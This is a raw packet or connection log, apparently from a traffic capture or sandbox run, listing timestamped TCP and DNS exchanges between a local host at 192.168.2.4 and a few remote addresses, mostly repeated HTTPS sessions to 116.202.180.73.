Feb 19, 2025 20:56:35.003149033 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:35.003169060 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:35.003218889 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:35.003235102 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:35.003235102 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.003279924 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.003329992 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:35.003343105 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:35.003460884 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.003494024 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.003810883 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.003922939 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:35.003973961 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.004008055 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.004091978 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:35.004167080 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.004200935 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.004280090 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:35.004363060 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.004539967 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.004620075 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:35.004705906 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.004890919 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.004975080 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:35.005054951 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.005088091 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.005167961 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:35.005244017 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.005373001 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.005458117 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:35.005481958 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.006273985 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.006390095 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:35.006561041 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.007195950 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:35.007215023 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.007224083 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:35.007318974 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:35.050086975 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.050121069 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.050242901 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:35.050424099 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.050757885 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.050879955 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:35.050920010 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.051098108 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.051882029 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.051959038 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:35.052037954 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.053272009 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.492578030 CET	443	49782	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.494658947 CET	49782	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:35.495167971 CET	49782	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:35.495182037 CET	443	49782	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.496668100 CET	49782	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:35.496673107 CET	443	49782	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.880889893 CET	58940	53	192.168.2.4	162.159.36.2
Feb 19, 2025 20:56:35.885967970 CET	53	58940	162.159.36.2	192.168.2.4
Feb 19, 2025 20:56:35.887389898 CET	58940	53	192.168.2.4	162.159.36.2
Feb 19, 2025 20:56:35.892400980 CET	53	58940	162.159.36.2	192.168.2.4
Feb 19, 2025 20:56:36.161526918 CET	443	49782	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:36.161545038 CET	443	49782	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:36.161612988 CET	443	49782	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:36.161761045 CET	49782	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:36.161851883 CET	49782	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:36.162278891 CET	49782	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:36.162302971 CET	443	49782	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:36.165988922 CET	58941	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:36.166037083 CET	443	58941	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:36.166132927 CET	58941	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:36.166405916 CET	58941	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:36.166423082 CET	443	58941	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:36.336534977 CET	58940	53	192.168.2.4	162.159.36.2
Feb 19, 2025 20:56:36.341887951 CET	53	58940	162.159.36.2	192.168.2.4
Feb 19, 2025 20:56:36.341973066 CET	58940	53	192.168.2.4	162.159.36.2
Feb 19, 2025 20:56:36.824429989 CET	443	58941	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:36.824647903 CET	58941	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:36.825290918 CET	58941	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:36.825319052 CET	443	58941	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:36.827603102 CET	58941	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:36.827610970 CET	443	58941	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:37.509109974 CET	443	58941	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:37.509125948 CET	443	58941	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:37.509180069 CET	443	58941	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:37.509408951 CET	58941	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:37.509649992 CET	58941	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:37.509671926 CET	443	58941	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:41.566998959 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:41.567073107 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:41.567171097 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:41.567171097 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:41.568169117 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:41.568216085 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:47.020601034 CET	58946	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:47.020637989 CET	443	58946	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:47.020739079 CET	58946	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:47.021039963 CET	58946	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:47.021054029 CET	443	58946	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:47.683435917 CET	443	58946	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:47.683499098 CET	58946	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:47.684061050 CET	58946	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:47.684071064 CET	443	58946	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:47.686022997 CET	58946	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:47.686028004 CET	443	58946	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:47.686101913 CET	58946	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:47.686120033 CET	443	58946	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:47.686196089 CET	58946	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:47.686216116 CET	443	58946	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:48.010644913 CET	49732	80	192.168.2.4	95.100.110.29
Feb 19, 2025 20:56:48.010665894 CET	49731	80	192.168.2.4	2.19.120.90
Feb 19, 2025 20:56:48.010750055 CET	49733	80	192.168.2.4	2.21.65.150
Feb 19, 2025 20:56:48.010750055 CET	49734	80	192.168.2.4	2.21.65.138
Feb 19, 2025 20:56:48.016356945 CET	80	49732	95.100.110.29	192.168.2.4
Feb 19, 2025 20:56:48.016398907 CET	80	49731	2.19.120.90	192.168.2.4
Feb 19, 2025 20:56:48.016458988 CET	49732	80	192.168.2.4	95.100.110.29
Feb 19, 2025 20:56:48.016504049 CET	49731	80	192.168.2.4	2.19.120.90
Feb 19, 2025 20:56:48.017007113 CET	80	49733	2.21.65.150	192.168.2.4
Feb 19, 2025 20:56:48.017038107 CET	80	49734	2.21.65.138	192.168.2.4
Feb 19, 2025 20:56:48.017066002 CET	49733	80	192.168.2.4	2.21.65.150
Feb 19, 2025 20:56:48.017091990 CET	49734	80	192.168.2.4	2.21.65.138
Feb 19, 2025 20:56:48.039671898 CET	58947	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:48.039721012 CET	443	58947	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:48.040328979 CET	58947	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:48.043342113 CET	58947	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:48.043359041 CET	443	58947	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:48.568521976 CET	443	58946	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:48.568633080 CET	58946	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:48.568660975 CET	443	58946	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:48.568711042 CET	58946	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:48.568711996 CET	443	58946	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:48.568764925 CET	58946	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:48.569921970 CET	58946	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:48.569936991 CET	443	58946	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:48.824228048 CET	443	58947	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:48.824307919 CET	58947	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:48.829562902 CET	58947	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:48.829574108 CET	443	58947	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:48.830945969 CET	58947	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:48.830945969 CET	58947	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:48.830955029 CET	443	58947	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:48.830976009 CET	443	58947	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:49.037950993 CET	58948	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:49.038007021 CET	443	58948	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:49.038089037 CET	58948	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:49.038322926 CET	58948	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:49.038335085 CET	443	58948	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:49.574048996 CET	443	58947	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:49.574131966 CET	443	58947	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:49.574136972 CET	58947	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:49.575427055 CET	58947	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:49.575427055 CET	58947	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:49.683384895 CET	443	58948	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:49.683482885 CET	58948	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:49.683872938 CET	58948	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:49.683902979 CET	443	58948	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:49.685534954 CET	58948	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:49.685547113 CET	443	58948	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:49.685657978 CET	58948	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:49.685678005 CET	443	58948	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:49.885405064 CET	58947	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:49.885422945 CET	443	58947	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:50.053009987 CET	58949	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:50.053052902 CET	443	58949	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:50.053215027 CET	58949	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:50.053519964 CET	58949	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:50.053529024 CET	443	58949	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:50.417357922 CET	443	58948	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:50.417471886 CET	58948	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:50.417495012 CET	443	58948	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:50.417558908 CET	443	58948	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:50.417565107 CET	58948	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:50.417613983 CET	58948	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:50.418565989 CET	58948	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:50.418582916 CET	443	58948	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:50.699222088 CET	443	58949	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:50.699290037 CET	58949	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:50.700196981 CET	58949	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:50.700201035 CET	443	58949	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:50.702521086 CET	58949	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:50.702523947 CET	443	58949	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:50.702594995 CET	58949	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:50.702604055 CET	443	58949	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:51.162184000 CET	58950	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:51.162273884 CET	443	58950	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:51.162368059 CET	58950	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:51.163043022 CET	58950	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:51.163078070 CET	443	58950	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:51.494071007 CET	443	58949	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:51.494133949 CET	443	58949	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:51.494260073 CET	58949	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:51.495531082 CET	58949	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:51.495542049 CET	443	58949	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:51.844846964 CET	443	58950	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:51.844938993 CET	58950	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:51.845514059 CET	58950	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:51.845541954 CET	443	58950	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:51.847527027 CET	58950	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:51.847541094 CET	443	58950	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:51.847593069 CET	58950	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:51.847609997 CET	443	58950	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:52.229372978 CET	58951	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:52.229408026 CET	443	58951	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:52.229504108 CET	58951	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:52.229737997 CET	58951	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:52.229747057 CET	443	58951	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:52.576004982 CET	443	58950	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:52.576086998 CET	58950	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:52.576112032 CET	443	58950	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:52.576172113 CET	58950	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:52.576200962 CET	443	58950	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:52.576257944 CET	58950	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:52.577275991 CET	58950	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:52.577290058 CET	443	58950	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:52.979763985 CET	443	58951	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:52.980061054 CET	58951	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:52.980621099 CET	58951	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:52.980627060 CET	443	58951	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:52.982465982 CET	58951	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:52.982470036 CET	443	58951	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:52.982542992 CET	58951	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:52.982554913 CET	443	58951	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:53.216790915 CET	58952	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:53.216841936 CET	443	58952	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:53.216926098 CET	58952	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:53.217271090 CET	58952	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:53.217289925 CET	443	58952	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:53.621541023 CET	443	58951	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:53.621608973 CET	443	58951	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:53.621764898 CET	58951	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:53.621764898 CET	58951	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:53.622751951 CET	58951	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:53.622761965 CET	443	58951	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:53.900082111 CET	443	58952	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:53.900263071 CET	58952	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:53.907342911 CET	58952	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:53.907356977 CET	443	58952	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:53.930763006 CET	58952	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:53.930763006 CET	58952	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:53.930778027 CET	443	58952	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:53.930798054 CET	443	58952	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:54.452538967 CET	58953	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:54.452588081 CET	443	58953	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:54.452682018 CET	58953	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:54.453327894 CET	58953	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:54.453368902 CET	443	58953	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:54.635071993 CET	443	58952	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:54.635231972 CET	58952	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:54.635257006 CET	443	58952	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:54.635278940 CET	443	58952	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:54.635369062 CET	58952	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:54.636574984 CET	58952	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:54.636588097 CET	443	58952	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:55.161192894 CET	443	58953	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:55.161309958 CET	58953	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:55.161984921 CET	58953	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:55.162015915 CET	443	58953	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:55.163903952 CET	58953	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:55.163918018 CET	443	58953	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:55.164041996 CET	58953	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:55.164057970 CET	443	58953	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:55.341109991 CET	58954	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:55.341141939 CET	443	58954	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:55.341228008 CET	58954	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:55.341459990 CET	58954	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:55.341473103 CET	443	58954	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:55.792464972 CET	443	58953	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:55.792531967 CET	443	58953	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:55.792551994 CET	58953	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:55.792583942 CET	58953	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:55.793488979 CET	58953	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:55.793507099 CET	443	58953	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:56.023288965 CET	443	58954	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:56.023386955 CET	58954	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:56.023897886 CET	58954	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:56.023905993 CET	443	58954	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:56.025546074 CET	58954	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:56.025552034 CET	443	58954	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:56.025610924 CET	58954	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:56.025620937 CET	443	58954	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:56.347728968 CET	58955	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:56.347788095 CET	443	58955	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:56.347879887 CET	58955	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:56.348172903 CET	58955	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:56.348215103 CET	443	58955	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:56.776546001 CET	443	58954	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:56.776634932 CET	58954	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:56.776675940 CET	443	58954	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:56.776726961 CET	58954	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:56.776738882 CET	443	58954	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:56.776788950 CET	58954	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:56.816745996 CET	58954	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:56.816771030 CET	443	58954	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:57.027964115 CET	443	58955	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:57.028044939 CET	58955	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:57.038955927 CET	58955	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:57.038975954 CET	443	58955	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:57.048132896 CET	58955	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:57.048146963 CET	443	58955	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:57.048178911 CET	58955	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:57.048188925 CET	443	58955	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:57.369623899 CET	58956	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:57.369739056 CET	443	58956	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:57.369842052 CET	58956	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:57.370063066 CET	58956	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:57.370102882 CET	443	58956	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:57.764353991 CET	443	58955	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:57.764426947 CET	58955	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:57.764431000 CET	443	58955	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:57.764477968 CET	58955	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:57.765289068 CET	58955	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:57.765307903 CET	443	58955	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:58.024962902 CET	443	58956	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:58.025232077 CET	58956	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:58.025605917 CET	58956	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:58.025635004 CET	443	58956	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:58.027127028 CET	58956	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:58.027139902 CET	443	58956	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:58.027182102 CET	58956	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:58.027200937 CET	443	58956	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:58.379431009 CET	58957	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:58.379527092 CET	443	58957	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:58.379618883 CET	58957	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:58.379992962 CET	58957	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:58.380027056 CET	443	58957	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:58.655199051 CET	443	58956	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:58.655428886 CET	443	58956	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:58.655524015 CET	58956	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:58.655524969 CET	58956	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:58.656162977 CET	58956	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:58.656207085 CET	443	58956	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:59.033526897 CET	443	58957	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:59.033600092 CET	58957	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:59.033957958 CET	58957	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:59.033986092 CET	443	58957	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:59.035767078 CET	58957	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:59.035779953 CET	443	58957	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:59.035821915 CET	58957	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:59.035840034 CET	443	58957	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:59.671967030 CET	58958	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:59.672068119 CET	443	58958	116.202.180.73	192.168.2.4
